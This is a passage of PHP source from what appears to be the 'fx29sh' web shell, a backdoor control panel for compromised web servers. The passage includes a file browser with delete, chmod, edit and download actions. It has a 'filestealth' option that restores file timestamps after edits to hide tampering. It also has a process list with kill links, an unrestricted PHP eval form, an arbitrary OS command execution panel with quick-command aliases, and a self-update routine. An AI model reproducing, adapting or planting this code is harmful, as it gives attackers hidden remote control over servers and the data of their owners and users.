1858 $row[] = "<b>Date Modified</b>";
1859 if (!is_windows()) {$row[] = "<b>Owner/Group</b>";}
1860 $row[] = "<b>Perms</b>";
1861 $row[] = "<b>Action</b>";
1862 $parsesort = parsesort($sort);
1863 $sort = $parsesort[0].$parsesort[1];
1864 $k = $parsesort[0];
1865 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1866 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1867 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" alt=\"".($parsesort[1] == "a"?"Asc":"Desc")."\"></a>";
1868 $row[$k] .= $y;
1869 for($i=0;$i<count($row)-1;$i++) {
1870 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1871 }
1872 $v = $parsesort[0];
1873 usort($objects["folders"], "tabsort");
1874 usort($objects["links"], "tabsort");
1875 usort($objects["files"], "tabsort");
1876 if ($parsesort[1] == "d") {
1877 $objects["folders"] = array_reverse($objects["folders"]);
1878 $objects["files"] = array_reverse($objects["files"]);
1879 }
1880 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1881 $tab = array();
1882 $tab["cols"] = array($row);
1883 $tab["head"] = array();
1884 $tab["folders"] = array();
1885 $tab["links"] = array();
1886 $tab["files"] = array();
1887 $i = 0;
1888 foreach ($objects as $a) {
1889 $v = $a[0];
1890 $o = basename($v);
1891 $dir = dirname($v);
1892 if ($disp_fullpath) { $disppath = $v; }
1893 else { $disppath = $o; }
1894 $disppath = str2mini($disppath,60);
1895 if (in_array($v,$sess_data["cut"])) { $disppath = "<strike>".$disppath."</strike>"; }
1896 elseif (in_array($v,$sess_data["copy"])) { $disppath = "<u>".$disppath."</u>"; }
1897 foreach ($regxp_highlight as $r) {
1898 if ( ereg($r[0],strtolower($o)) ) {
1899 if ((!is_numeric($r[1])) or ($r[1] > 3)) {
1900 $r[1] = 0;
1901 @ob_clean();
1902 disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command.");
1903 fx29shexit();
1904 }
1905 else {
1906 $r[1] = round($r[1]);
1907 $isdir = is_dir($v);
1908 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
1909 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
1910 $disppath = $r[2].$disppath.$r[3];
1911 if (isset($r[4])) { break; }
1912 }
1913 }
1914 }
1915 }
1916 $uo = urlencode($o);
1917 $ud = urlencode($dir);
1918 $uv = urlencode($v);
1919 $row = array();
1920 if ($o == ".") {
1921 $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> ".$o."</a>";
1922 $row[] = "CURDIR";
1923 }
1924 elseif ($o == "..") {
1925 $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> ".$o."</a>";
1926 $row[] = "UPDIR";
1927 }
1928 elseif (is_dir($v)) {
1929 if (is_link($v)) {
1930 $disppath .= " => ".readlink($v);
1931 $type = "LNK";
1932 $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> [".$disppath."]</a>";
1933 }
1934 else {
1935 $type = "DIR";
1936 $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> [".$disppath."]</a>";
1937 }
1938 $row[] = $type;
1939 }
1940 elseif(is_file($v)) {
1941 $ext = explode(".",$o);
1942 $c = count($ext)-1;
1943 $ext = $ext[$c];
1944 $ext = strtolower($ext);
1945 $row[] = "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" alt=\"\"> ".$disppath."</a>";
1946 $row[] = view_size($a[1]);
1947 }
1948 $row[] = @date("d.m.Y H:i:s",$a[2]);
1949 if (!is_windows()) { $row[] = $a[3]; }
1950 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
1951
1952 if ($o == ".") {
1953 $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">";
1954 $i--;
1955 }
1956 else {
1957 $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";
1958 }
1959
1960 if (is_dir($v)) {
1961 $row[] = "$checkbox <a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ";
1962 }
1963 else {
1964 $row[] = "$checkbox ".
1965 "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ".
1966 "<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\"></a> ".
1967 "<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\"></a>";
1968 }
1969
1970 if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; }
1971 elseif (is_link($v)) { $tab["links"][] = $row; }
1972 elseif (is_dir($v)) { $tab["folders"][] = $row; }
1973 elseif (is_file($v)) { $tab["files"][] = $row; }
1974
1975 $i++;
1976 }
1977 }
1978 #Listing Files & Folders
1979 echo "<div class=barheader>.: ";
1980 if (!empty($fx_infohead)) { echo $fx_infohead; }
1981 else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
1982 echo " :.</div>\n\n";
1983 echo "<form name=\"ls_form\" action=\"$surl\" method=POST>\n".
1984 "<input type=hidden name=act value=\"$dspact\">\n".
1985 "<input type=hidden name=d value=\"$d\">\n";
1986?>
1987<table class="explorer">
1988<?php
1989 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
1990 foreach($table as $row) {
1991 echo "\t<tr>";
1992 foreach($row as $v) { echo "<td>".$v."</td>"; }
1993 echo "</tr>\n";
1994 }
1995?>
1996</table>
1997
1998<div align="right">
1999
2000 <script language="javascript">
2001 function ls_setcheckboxall(status) {
2002 var id = 1; var num = <?php echo(count($table) - 2); ?>;
2003 while (id <= num) {
2004 document.getElementById('actbox'+id).checked = status; id++;
2005 }
2006 }
2007 function ls_reverse_all() {
2008 var id = 1; var num = <?php echo(count($table) - 2); ?>;
2009 while (id <= num) {
2010 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++;
2011 }
2012 }
2013 </script>
2014
2015 <input type="button" onclick="ls_setcheckboxall(true);" value="Check all">
2016 <input type="button" onclick="ls_setcheckboxall(false);" value="Uncheck all">
2017<?php
2018 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0) {
2019 echo "\t<input type=\"submit\" name=\"actarcbuff\" value=\"Archive it!\">".
2020 "\t<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">\n".
2021 "\t<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">\n".
2022 "\t<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">";
2023 }
2024 echo "\n\t".
2025 "<select name=act>\n".
2026 "\t\t<option value=\"".$act."\">With checked:</option>\n";
2027
2028 $f_acts = array("delete","chmod","cut","copy","unselect");
2029 foreach ($f_acts as $f1) {
2030 echo "\t\t<option value=\"$f1\"".($dspact == "$f1"?" selected":"").">$f1</option>\n";
2031 }
2032 ?>
2033 </select>
2034
2035 <input type="submit" value="Confirm">
2036
2037</div>
2038</form>
2039<?php
2040 }
2041 }
2042
2043 ##[ FILE ]##
2044 if ($act == "f") {
2045 echo "<div align=left>";
2046 if (!isset($ft)) { $ft = ""; }
2047 if (!isset($newwin)) { $newwin = ""; }
2048 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
2049 if (file_exists($d.$f)) {
2050 disp_error("Access denied!<br>".htmlspecialchars($d.$f));
2051 }
2052 else {
2053 disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."<br>\n".
2054 "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a>");
2055 }
2056 }
2057 else {
2058 $r = @file_get_contents($d.$f);
2059 $ext = explode(".",$f);
2060 $c = count($ext)-1;
2061 $ext = $ext[$c];
2062 $ext = strtolower($ext);
2063 $rft = "";
2064 foreach ($ftypes as $k => $v) {
2065 if (in_array($ext,$v)) { $rft = $k; break; }
2066 }
2067 if (eregi("sess_(.*)",$f)) { $rft = "phpsess"; }
2068 if (empty($ft)) { $ft = $rft; }
2069
2070 $arr = array(
2071 array("<img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\">","info"),
2072 array("<img src=\"".$surl."act=img&img=ext_html\" alt=\"html\">","html"),
2073 array("<img src=\"".$surl."act=img&img=ext_txt\" alt=\"txt\">","txt"),
2074 array("<img src=\"".$surl."act=img&img=ext_ini\" alt=\"ini\">","ini"),
2075 array("Code","code"),
2076 array("Session","phpsess"),
2077 array("SDB","sdb"),
2078 array("<img src=\"".$surl."act=img&img=ext_exe\" alt=\"exe\">","exe"),
2079 array("<img src=\"".$surl."act=img&img=ext_gif\" alt=\"img\">","img"),
2080 array("<img src=\"".$surl."act=img&img=ext_rtf\" alt=\"Notepad\">","notepad"),
2081 array("<img src=\"".$surl."act=img&img=change\" alt=\"Edit\">","edit"),
2082 array("<img src=\"".$surl."act=img&img=download\" alt=\"Download\">","download")
2083 );
2084
2085 echo "<div class=barheader>.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f).") :.\n";
2086 echo "<hr size=1 noshade>\n";
2087 foreach($arr as $t) {
2088 if ($t[1] == $rft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=#3366FF>".$t[0]."</font></a>"; }
2089 elseif ($t[1] == $ft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>"; }
2090 else { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>"; }
2091 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."&newwin=1\" title=\"New Window\" target=\"_blank\">+</a>) ";
2092 }
2093 echo "</div>\n";
2094 if ($ft == "info") {
2095 echo "<br><div class=barheader>Information</div>\n".
2096 "<table class=contents>\n".
2097 "<tr><th>Path</th><td>".$d.$f."</td></tr>\n".
2098 "<tr><th>Size</th><td>".view_size(filesize($d.$f))."</td></tr>\n".
2099 "<tr><th>MD5</th><td>".md5_file($d.$f)."</td></tr>\n";
2100 if (!is_windows()) {
2101 echo "<tr><th><b>Owner/Group</b></td><td>";
2102 $ow = posix_getpwuid(fileowner($d.$f));
2103 $gr = posix_getgrgid(filegroup($d.$f));
2104 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2105 }
2106 echo "<tr><th>Perms</th><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr>\n".
2107 "<tr><th>Create time</th><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>\n".
2108 "<tr><th>Access time</th><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>\n".
2109 "<tr><th>Modify time</th><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>\n";
2110 echo "<tr><th>HexDump</th><td>\n".
2111 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a> ] ".
2112 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a> ]<br>\n".
2113 "</td></tr>\n".
2114 "<tr><th>Base64</th><td>\n".
2115 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a> ] ".
2116 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a> ] ".
2117 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a> ] ".
2118 "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a> ] ".
2119 "</td></tr>\n".
2120 "</table><br>\n";
2121 $fi = fopen($d.$f,"rb");
2122 if ($fi) {
2123 echo "<div class=barheader>";
2124 if (@$fullhexdump) { echo "Full HexDump"; $str = fread($fi,filesize($d.$f)); }
2125 else { echo "HexDump Preview"; $str = fread($fi,$hexdump_lines*$hexdump_rows); }
2126 $n = 0;
2127 $a0 = "00000000<br>";
2128 $a1 = "";
2129 $a2 = "";
2130 for ($i=0; $i<strlen($str); $i++) {
2131 $a1 .= sprintf("%02X",ord($str[$i]))." ";
2132 switch (ord($str[$i])) {
2133 case 0 : $a2 .= "<font>0</font>"; break;
2134 case 32:
2135 case 10:
2136 case 13: $a2 .= " "; break;
2137 default: $a2 .= htmlspecialchars($str[$i]);
2138 }
2139 $n++;
2140 if ($n == $hexdump_rows) {
2141 $n = 0;
2142 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2143 $a1 .= "<br>";
2144 $a2 .= "<br>";
2145 }
2146 }
2147 echo "</div>\n";
2148 echo "<table class=code><tr><td>".$a0."</td><td>".$a1."</td><td>".$a2."</td></tr></table><br>\n";
2149 }
2150 $henc = "";
2151 $encoded = "";
2152 if (!isset($base64)) { $base64 = ""; }
2153 if ($base64 == 1) {
2154 $henc = "Base64 Encode";
2155 $encoded = base64_encode(file_get_contents($d.$f));
2156 }
2157 elseif($base64 == 2) {
2158 $henc = "Base64 Encode + Chunk";
2159 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2160 }
2161 elseif($base64 == 3) {
2162 $henc = "Base64 Encode + Chunk + Quotes";
2163 $encoded = base64_encode(file_get_contents($d.$f));
2164 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2165 }
2166 elseif($base64 == 4) {
2167 $text = file_get_contents($d.$f);
2168 $encoded = base64_decode($text);
2169 $henc = "<b>Base64 Decode";
2170 if (base64_encode($encoded) != $text) { $henc .= " (Failed!)"; }
2171 }
2172 if (!empty($encoded)) {
2173 echo "<div class=barheader>$henc</div>\n";
2174 echo "<textarea cols=100 rows=10>".htmlspecialchars($encoded)."</textarea>";
2175 echo "<br>\n";
2176 }
2177 }
2178 elseif ($ft == "html") {
2179 if ($newwin) { @ob_clean(); echo $r; fx29shexit(); }
2180 else { echo $r; }
2181 }
2182 elseif ($ft == "txt") {
2183 echo "<center><textarea cols=\"125\" rows=\"20\">".htmlspecialchars($r)."</textarea></center>";
2184 }
2185 elseif ($ft == "ini") {
2186 echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";
2187 }
2188 elseif ($ft == "phpsess") {
2189 echo "<pre>";
2190 $v = explode("|",$r);
2191 echo $v[0]."<br>";
2192 var_dump(unserialize($v[1]));
2193 echo "</pre>";
2194 }
2195 elseif ($ft == "exe") {
2196 $ext = explode(".",$f);
2197 $c = count($ext)-1;
2198 $ext = $ext[$c];
2199 $ext = strtolower($ext);
2200 $rft = "";
2201 foreach ($exeftypes as $k => $v) {
2202 if (in_array($ext,$v)) { $rft = $k; break; }
2203 }
2204 $cmd = str_replace("%f%",$f,$rft);
2205 echo "<b>Execute file:</b>\n".
2206 "<form name=\"f_xfile\" action=\"".$surl."\" method=POST>\n".
2207 "<input type=hidden name=act value=cmd>\n".
2208 "<input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br>\n".
2209 "<input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"> \n".
2210 "<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked> - Display in text-area\n".
2211 "<input type=submit name=submit value=\"Execute\"></form>\n";
2212 }
2213 elseif ($ft == "sdb") { echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>\n"; }
2214 elseif ($ft == "code") {
2215 echo "<div class=code style=\"background-color: ".$highlight_bg."\">\n";
2216 if (@$newwin) { @ob_clean(); highlight_file($d.$f); fx29shexit(); }
2217 else { highlight_file($d.$f); }
2218 echo "\n</div>\n";
2219 }
2220 elseif ($ft == "notepad") {
2221 @ob_clean();
2222 header("Content-type: text/plain");
2223 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2224 echo($r);
2225 exit;
2226 }
2227 elseif ($ft == "download") {
2228 @ob_clean();
2229 header("Content-type: application/octet-stream");
2230 header("Content-length: ".filesize($d.$f));
2231 header("Content-disposition: attachment; filename=\"".$f."\";");
2232 echo "<pre>"; var_dump(headers_list()); echo "</pre>";
2233 echo $r;
2234 exit;
2235 }
2236 elseif ($ft == "img") {
2237 $inf = getimagesize($d.$f);
2238 if (!$newwin) {
2239 if (empty($imgsize)) {$imgsize = 20;}
2240 $width = $inf[0]/100*$imgsize;
2241 $height = $inf[1]/100*$imgsize;
2242 echo "<center><b>Size:</b> ";
2243 $sizes = array("100","50","20");
2244 foreach ($sizes as $v) {
2245 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2246 if ($imgsize != $v ) {echo $v;}
2247 else {echo "<u>".$v."</u>";}
2248 echo "</a> ";
2249 }
2250 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&newwin=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\"></center>";
2251 }
2252 else {
2253 @ob_clean();
2254 $ext = explode($f,".");
2255 $ext = $ext[count($ext)-1];
2256 header("Content-type: ".$inf["mime"]);
2257 readfile($d.$f);
2258 exit;
2259 }
2260 }
2261 elseif ($ft == "edit") {
2262 if (!empty($submit)) {
2263 if ($filestealth) {$stat = stat($d.$f);}
2264 $fp = fopen($d.$f,"w");
2265 if (!$fp) {echo "<b>Can't write to file!</b>";}
2266 else {
2267 echo "<b>Saved!</b>";
2268 fwrite($fp,$edit_text);
2269 fclose($fp);
2270 if ($filestealth) { touch($d.$f,$stat[9],$stat[8]); }
2271 $r = $edit_text;
2272 }
2273 }
2274 $rows = count(explode("\r\n",$r));
2275 if ($rows < 10) { $rows = 10; }
2276 elseif ($rows > 30) { $rows = 30; }
2277 echo "<form name=\"f_save\" action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST>\n".
2278 "<input type=submit name=submit value=\"Save\"> ".
2279 "<input type=\"reset\" value=\"Reset\"> ".
2280 "<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br>".
2281 "<textarea name=\"edit_text\" cols=\"125\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea>\n".
2282 "</form>\n";
2283 }
2284 elseif (!empty($ft)) {
2285 echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";
2286 }
2287 else {
2288 echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";
2289 }
2290 }
2291 echo "</div>\n";
2292 }
2293
2294 ##[ DIRECTORY ]##
2295 if ($act == "d") {
2296 if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
2297 else {
2298 echo "<b>Directory information:</b>\n";
2299 echo "<table>\n";
2300 if (!is_windows()) {
2301 echo "<tr><td><b>Owner/Group</b></td><td> ";
2302 $ow = posix_getpwuid(fileowner($d));
2303 $gr = posix_getgrgid(filegroup($d));
2304 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
2305 }
2306 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
2307 }
2308 }
2309
2310 ##[ PROCESSES ]##
2311 if ($act == "processes") {
2312?>
2313<div class="barheader">.: Processes :.</div>
2314
2315<?php
2316 if (!is_windows()) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
2317 else { $handler = "tasklist"; }
2318 $ret = fx29exec($handler);
2319 if (!$ret) { disp_error("Can't execute \"$handler\"!"); }
2320 else {
2321 if (empty($processes_sort)) { $processes_sort = $sort_default; }
2322 $parsesort = parsesort($processes_sort);
2323 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2324 $k = $parsesort[0];
2325 if ($parsesort[1] != "a") {
2326 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
2327 }
2328 else {
2329 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
2330 }
2331 $ret = htmlspecialchars($ret);
2332 if (!is_windows()) {
2333 if ($pid) {
2334 if (is_null($sig)) { $sig = 9; }
2335 echo "Sending signal ".$sig." to #".$pid."... ";
2336 if (posix_kill($pid,$sig)) { echo "<b>OK!</b>"; } else { echo "<b>ERROR!</b>"; }
2337 }
2338 while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2339 $stack = explode("\n",$ret);
2340 $head = explode(" ",$stack[0]);
2341 unset($stack[0]);
2342 for($i=0;$i<count($head);$i++) {
2343 if ($i != $k) {
2344 $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
2345 }
2346 }
2347 $head[$i] = "";
2348 $prcs = array();
2349 foreach ($stack as $line) {
2350 if (!empty($line)) {
2351 $line = explode(" ",$line);
2352 $line[10] = join(" ",array_slice($line,10));
2353 $line = array_slice($line,0,11);
2354 if ($line[0] == get_current_user()) { $line[0] = '<font class="on">'.$line[0]."</font>"; }
2355 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2356 $prcs[] = $line;
2357 }
2358 }
2359 }
2360 #For Windows - Fixed By FaTaLisTiCz_Fx
2361 else {
2362 if (@$pid) {
2363 echo "Killing PID ".$pid."... ";
2364 echo fx29exec("taskkill /PID $pid /F");
2365 }
2366 while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2367 while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
2368 $ret = convert_cyr_string($ret,"d","w");
2369 $stack = explode("\n",$ret);
2370 unset($stack[0],$stack[2]);
2371 $stack = array_values($stack);
2372 $stack[0] = str_replace("Image Name","Image-Name",$stack[0]);
2373 $stack[0] = str_replace("Session Name","Session-Name",$stack[0]);
2374 $stack[0] = str_replace("Mem Usage","Memory-Usage",$stack[0]);
2375 $stack[0] .= " KILL";
2376 $head = explode(" ",$stack[0]);
2377 $stack = array_slice($stack,1);
2378 $head = array_values($head);
2379 if ($parsesort[1] != "a") {
2380 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
2381 }
2382 else {
2383 $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
2384 }
2385 if ($k > count($head)) {$k = count($head)-1;}
2386 for($i=0;$i<count($head);$i++) {
2387 if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
2388 }
2389 $prcs = array();
2390 unset($stack[0]);
2391 foreach ($stack as $line) {
2392 if (!empty($line)) {
2393 $line = explode(" ",$line);
2394 $line[4] = str_replace(".","",$line[4]);
2395 $line[4] = intval($line[4]) * 1024;
2396 unset($line[5]);
2397 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."\"><u>KILL</u></a>";
2398 $prcs[] = $line;
2399 }
2400 }
2401 }
2402 $head[$k] = "<b>".$head[$k]."</b>".$y;
2403 $v = $processes_sort[0];
2404 usort($prcs,"tabsort");
2405 if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
2406 $tab = array();
2407 $tab[] = $head;
2408 $tab = array_merge($tab,$prcs);
2409 echo "<table class=\"explorer\">\n";
2410 foreach($tab as $i=>$k) {
2411 echo "\t<tr>";
2412 foreach($k as $j=>$v) {
2413 if (is_windows() and $i > 0 and $j == 4) { $v = view_size($v); }
2414 echo "<td>".$v."</td>";
2415 }
2416 echo "</tr>\n";
2417 }
2418 echo "</table>\n";
2419 }
2420 }
2421
2422 ##[ EVAL ]##
2423 if ($act == "eval") {
2424 if (!empty($eval)) {
2425 echo "<div class=barheader>Result of execution this PHP-code:</div>\n";
2426 $tmp = @ob_get_contents();
2427 $olddir = realpath(".");
2428 @chdir($d);
2429 if ($tmp) {
2430 @ob_clean();
2431 eval($eval);
2432 $ret = @ob_get_contents();
2433 $ret = convert_cyr_string($ret,"d","w");
2434 @ob_clean();
2435 echo $tmp;
2436 if (@$eval_txt) {
2437 $rows = count(explode("\r\n",$ret))+1;
2438 if ($rows < 10) {$rows = 10;}
2439 echo "<br><textarea cols=\"125\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2440 }
2441 else {echo $ret."<br>";}
2442 }
2443 else {
2444 if ($eval_txt) {
2445 echo "<br><textarea cols=\"125\" rows=\"10\" readonly>";
2446 eval($eval);
2447 echo "</textarea>";
2448 }
2449 else {echo $ret;}
2450 }
2451 @chdir($olddir);
2452 }
2453 else {
2454 echo "<div class=\"barheader\">.: PHP-code Execution :.</div>\n\n";
2455 if (empty($eval_txt)) { $eval_txt = TRUE; }
2456 }
2457?>
2458<form name="f_eval" action="<?php echo $surl; ?>" method="POST">
2459 <input type="hidden" name="act" value="eval">
2460 <textarea name="eval" cols="125" rows="10">
2461<?php
2462echo htmlspecialchars(@$eval);
2463?>
2464 </textarea>
2465 <input type="hidden" name="d" value="<?php echo $dispd; ?>"><br>
2466 <input type="submit" value="Execute"> Display in text-area <input type="checkbox" name="eval_txt" value="1"<?php if (@$eval_txt) { echo " checked"; } ?>>
2467</form>
2468<?php
2469 }
2470
2471 ##[ UPDATE ]##
2472 if ($act == "update") {
2473 $ret = fx29sh_getupdate(@$confirmupdate);
2474 echo "<b>$ret</b>";
2475 if (stristr($ret,"new version")) {
2476 echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
2477 }
2478 }
2479 if ($act == "phpinfo") { @ob_clean(); phpinfo(); fx29shexit(); }
2480 if ($act == "tools") { fx29sh_tools(); }
2481 if ($act == "about") { fx29sh_about(); }
2482}
2483##[ END OF ACTIONS ]##
2484
2485######################
2486##[ COMMANDS PANEL ]##
2487######################
2488?>
2489
2490</div>
2491<!-- End of Main Info -->
2492
2493<!-- Commands Panel -->
2494<div id="main">
2495
2496 <div class="bartitle"><b>.: COMMANDS PANEL :.</b></div>
2497
2498<table id="mainpanel">
2499 <tr><th colspan="2">Command:</th>
2500 <td>
2501 <form name="f_cmd" method="POST">
2502 <input type="hidden" name="act" value="cmd">
2503 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2504 <input type="hidden" name="cmd_txt" value="1">
2505 <input type="text" name="cmd" size="100" value="<?php echo @htmlspecialchars($cmd); ?>">
2506 <input type="submit" name="submit" value="Execute">
2507 </form>
2508 </td></tr>
2509
2510 <tr><th colspan="2">Quick Commands:</th>
2511 <td>
2512 <form name="f_qcmd" method="POST">
2513 <input type="hidden" name="act" value="cmd">
2514 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2515 <input type="hidden" name="cmd_txt" value="1">
2516 <select name="cmd">
2517<?php
2518foreach ($cmdaliases as $als) {
2519 echo "\t\t\t";
2520 echo '<option value="'.htmlspecialchars($als[1]).'">'.htmlspecialchars($als[0]).'</option>';
2521 echo "\n";
2522}
2523?>
2524 </select>
2525 <input type="submit" name="submit" value="Execute">
2526 </form>
2527 </td></tr>
2528
2529 <tr><th colspan="2" rowspan="2">PHP Filesystem:</th>
2530 <td>
2531 <script language="javascript">
2532 function set_arg(txt1,txt2) {
2533 document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
2534 document.forms.fphpfsys.arg1.value = txt1;
2535 document.forms.fphpfsys.arg2.value = txt2;
2536 }
2537 function chg_arg(num,txt1,txt2) {
2538 if (num==0) {
2539 document.forms.fphpfsys.arg1.type = "hidden";
